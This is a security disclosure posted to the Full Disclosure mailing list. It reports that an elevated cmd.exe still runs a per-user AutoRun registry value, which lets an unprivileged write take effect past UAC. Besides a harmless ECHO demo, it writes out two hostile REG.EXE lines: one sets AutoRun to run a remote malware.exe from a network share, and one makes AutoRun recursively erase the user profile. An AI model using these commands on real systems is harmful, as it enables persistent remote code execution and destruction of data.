Defense in depth -- the Microsoft way (part 68): qUACkery is futile!

["Stefan Kanthak" <stefan.kanthak () nexgo de>]

Hi @ll,

the help text displayed by the command line "%COMSPEC% /?" as well as the
documentation <https://msdn.microsoft.com/en-us/library/cc771320.aspx> of
Windows' command processor CMD.EXE both state:

| * Executing registry subkeys
|
|   If you do not specify /d in String, Cmd.exe looks for the following
|   registry subkeys:
|
|   HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun\REG_SZ
|
|   HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun\REG_EXPAND_SZ
|
|   If one or both registry subkeys are present, they are executed before
|   all other variables.
|
|    ^
|   /!\ Warning
|   ¯¯¯
|   Incorrectly editing the registry may severely damage your system.


Especially this last remark is NOT correct, at least but incomplete:
correctly editing the registry may severely damage your system too!


Demonstration:
~~~~~~~~~~~~~~

0. Log on to the "protected" administrator account created during the
   installation of Windows.

1. Run the following command line to add the AutoRun registry entry:

   REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ /D "ECHO 
HKEY_CURRENT_USER" /F

2. Start the command processor C:\Windows\System32\cmd.exe per double-
   click or via command line %COMSPEC%: it prints the line

   | HKEY_CURRENT_USER

3. Start Windows^WFile Explorer, open the "System" directory, right-
   click on C:\Windows\System32\cmd.exe to display its context menu,
   then click on the "Run as administrator" entry and acknowledge the
   UAC prompt: again it prints the line

   | HKEY_CURRENT_USER

   OUCH: although running elevated now, the command processor eveluates
         a registry entry written by an unprivileged user, thereby
         bypassing the "wonderful" but completely futile security theatre
         known as user account control!

   JFTR: of course nobody uses the "protected" administrator account
         created during Windows setup for their everyday work, and also
         nobody will EVER start an elevated command prompt there?!


Now just consider to run one of the following command lines and imagine
what damage their execution may spark:

REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ 
"\\server\share\malware.exe" /F

REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ "ERASE /F /Q /S 
""%USERPROFILE%""" /F


stay tuned, and far away from "protected" accounts and split tokens!
Stefan Kanthak


PS: compare this misbehaviour of the command processor to that of COM, as
    documented in <https://msdn.microsoft.com/en-us/library/bb756926.aspx>:

| Beginning with Windows Vista® and Windows Server® 2008, if the integrity
| level of a process is higher than Medium, the COM runtime ignores per-
| user COM configuration and accesses only per-machine COM configuration.
| This action reduces the surface area for elevation of privilege attacks,
| preventing a process with standard user privileges from configuring a
| COM object with arbitrary code and having this code called from an
| elevated process.


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/